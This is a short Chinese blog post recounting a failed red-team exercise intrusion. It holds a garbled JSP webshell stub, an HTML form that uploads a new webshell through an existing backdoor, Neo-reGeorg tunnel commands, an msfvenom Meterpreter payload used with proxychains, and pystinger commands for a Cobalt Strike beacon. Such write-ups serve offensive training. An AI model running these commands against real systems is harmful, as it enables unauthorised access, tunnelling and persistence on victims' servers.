记一次失败的打点

共 1163字,需浏览 3分钟

 ·

2022-07-12 13:59


背景

在某次攻防演练的晚上,大佬给我一个网站,说有一个RCE漏洞打一下试试,抱着试试就逝世的心态,进行了打点行动。


上传webshell

在web目录发现了一个已存在木马xx.jsp

<%if(request.getParameter("f".getBytes());%>< a href="One_OK"></ a>

利用已经存在的上传后门,构建一个html表单来上传我们的自己木马

<form action="http://xx.x.x.x:8080/scdc/xx.jsp?f=fuckjp.jsp" method="post">      <textarea name=t cols=120 rows=10 width=45>your code</textarea><BR><center><br>    <input type=submit value="提交">  </form> 

目标不出网,无法外联


neoreg

还原大致流程

生成neoreg

py -2 neoreg.py generate -k password

上传&验证

py -2 neoreg.py -k password -u http://192.168.11.132/3.php`

msf上线

msfvenom -p windows/x64/meterpreter/bind_tcp  LPORT=9001 -f exe -o reverse.exe
gedit /etc/proxychains4.conf 



proxychains4 msfconsole





CS上线

pystinger

蚁剑上传proxy.phpstinger_server.exe并执行  start stinger_server.exe



攻击机执行

stinger_client.exe -w http://192.168.11.132/proxy.php -l 127.0.0.1 -p 60000

设置监听

上线



结束语

最后不幸被蓝队发现,痛失权限,打点失败。


往期回顾

01

微信小程序抓包之路
02


 Brida配合Burp模块
03

信息收集思路&工具分享



浏览 45
点赞
评论
收藏
分享

手机扫一扫分享

分享
举报
评论
图片
表情
推荐
点赞
评论
收藏
分享

手机扫一扫分享

分享
举报